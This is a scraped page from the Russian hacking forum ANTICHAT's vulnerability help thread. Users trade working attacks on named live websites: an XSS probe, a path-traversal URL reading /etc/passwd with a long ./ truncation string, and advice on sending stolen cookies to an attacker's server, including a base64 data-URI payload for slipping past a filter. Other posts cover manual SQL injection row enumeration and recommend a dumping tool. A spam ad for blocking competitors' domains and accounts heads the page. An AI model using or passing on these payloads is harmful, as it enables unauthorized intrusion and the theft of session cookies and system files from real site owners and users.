УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1629 из 2438

1629

Опции темы

Поиск в этой теме

Опции просмотра

#16281

05.02.2011, 16:12

boortyhuhtyu

Guest

Сообщений: n/a

Провел на форуме:
225312

Репутация: -6

Цитата:

Сообщение от Seravin

Seravin said:
бывает что и врёт, но как вариант попробуй отключить яваскрипт при регистрации

а если true что далше?

#16282

05.02.2011, 16:21

~d0s~

Познающий

Регистрация: 17.04.2010

Сообщений: 75

Провел на форуме:
691279

Репутация: 55

Цитата:

Сообщение от Zalepoks

Zalepoks said:

Код:

Code:
http://ontarioworld.ru/usercp/store/prem.php?p=javajavascriptscript:alert%28%20String.fromCharCode%28120,115,115%29%29

Может мне ктонить разяснить, что сделать здесь дальше ?

Код:

Code:
http://ontarioworld.ru/usercp/store/prem.php?p=../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././

Мб подумать чуть-чуть? Ты второй похожий инлкюд за 3 дня выкладываешь, впредь тебе никто не будет крутить их,ибо самому думать надо!!!111

И зачем ты туда алерт впихивал ?о_О

Мб прочтешь уже что-нибудь, а то так и будешь задавать вопросы =/

Цитата:

Сообщение от DCrypt

DCrypt said:
~d0s~
, как ты узнал сколько ././././ вставлять?

Везде по-разном, где-то такой метод отсечения не сработует,где-то сработует. Вообще,если нулбайт не поддается экранизированию, то геморой с етим делать не надо,но этот случай как раз второй =/

Цитата:

Сообщение от fl00der

fl00der said:
Путь посмотрел и посчитал вложенность.

Речь шла не о перемещение по каталогам ../ а про отброс расширения,т.к. там нулбайт поддается экранизированию, кароче если не понимаешь о чем вопрос,не надо пытаться ответить, темболее что я выше уже ответил.

#16283

05.02.2011, 16:34

DCrypt

Новичок

Регистрация: 21.01.2010

Сообщений: 0

Провел на форуме:
479

Репутация: 0

~d0s~, как ты узнал сколько ././././ вставлять?

#16284

05.02.2011, 17:59

fl00der

Постоянный

Регистрация: 17.12.2008

Сообщений: 353

Провел на форуме:
919131

Репутация: 74

Цитата:

Сообщение от DCrypt

DCrypt said:
~d0s~
, как ты узнал сколько ././././ вставлять?

Путь посмотрел и посчитал вложенность.

#16285

05.02.2011, 22:47

rootmd

Guest

Сообщений: n/a

Провел на форуме:
23579

Репутация: -5

Добрый вечер. Вот такая трабла, в пасивном XSS фильтрируется ">"

Вот код, показывает куки:

id=348532&returnto=>" уже есть. А как отправить куки на моем сервере? не пашет, так как используется ">" дважды

#16286

06.02.2011, 03:49

Kusto

Moderator - Level 7

Регистрация: 04.02.2007

Сообщений: 554

Провел на форуме:
7518056

Репутация: 1089

Отправить сообщение для Kusto с помощью ICQ

Цитата:

Сообщение от rootmd

rootmd said:
Добрый вечер. Вот такая трабла, в пасивном XSS фильтрируется ">"
Вот код, показывает куки:
id=348532&returnto=>" уже есть. А как отправить куки на моем сервере? не пашет, так как используется ">" дважды

в каждом отдельном случае надо смотреть как обойти фильтр, как правило надо смотреть обрезается только > или полностью код, панацеи тут нет как вариант помогает закодировать строку ну например строку alert(document.cookie) полностью заменяет такой код data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raW UpPC9zY3JpcHQ+

как видиш в нем не содержиться символа >

вобщем нельзя что то советовать , не видя конкретного сайта с уязвимостью

#16287

06.02.2011, 15:00

Ins3t

Участник форума

Регистрация: 18.07.2009

Сообщений: 272

Провел на форуме:
2083691

Репутация: 330

Цитата:

Сообщение от None

~d0s~, как ты узнал сколько ././././ вставлять?

/thread98525.html

Для кого тему прилепили?

#16288

07.02.2011, 00:32

Fooog

Постоянный

Регистрация: 19.09.2008

Сообщений: 511

Провел на форуме:
1866685

Репутация: 340

Отправить сообщение для Fooog с помощью ICQ

Отправить сообщение для Fooog с помощью AIM

Отправить сообщение для Fooog с помощью Yahoo

Да, конечно спасибо за то что искать направили. Поискал ещё часок. Никакого софта не нашел.

Проблема вот в чем:

Делаю ручками

LIMIT 0,1--

LIMIT 1,1--

LIMIT 2,1--

А это не совсем оптимально. Не удобно работать и времени много забирает.

Есть спец. софт который сам переберет базу и выведет все строки в удобном визуальном формате?

Нашел что то подобное. sql helper а ссылки все битые.

#16289

07.02.2011, 00:48

YuNi|[c

Участник форума

Регистрация: 17.09.2006

Сообщений: 248

Провел на форуме:
556476

Репутация: 66

может кто знает про это я ниче норм не нашел

Drupal Droptor Module SQL Injection Vulnerability

http://secunia.com/advisories/43179

#16290

07.02.2011, 00:48

Redwood

Участник форума

Регистрация: 10.09.2009

Сообщений: 120

Провел на форуме:
2212846

Репутация: 56

Цитата:

Сообщение от Fooog

Fooog said:
Да, конечно спасибо за то что искать направили. Поискал ещё часок. Никакого софта не нашел.
Проблема вот в чем:
Делаю ручками
LIMIT 0,1--
LIMIT 1,1--
LIMIT 2,1--
А это не совсем оптимально. Не удобно работать и времени много забирает.
Есть спец. софт который сам переберет базу и выведет все строки в удобном визуальном формате?
Нашел что то подобное. sql helper а ссылки все битые.

Я не просто отправил в поиск, а еще и дал ссылку на топик

/showthread.php?t=240692

Как вариант, пробуй rsaUnDumper[sql] – универсальный дампер SQL INJECTION.

Страница 1629 из 2438

1629

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход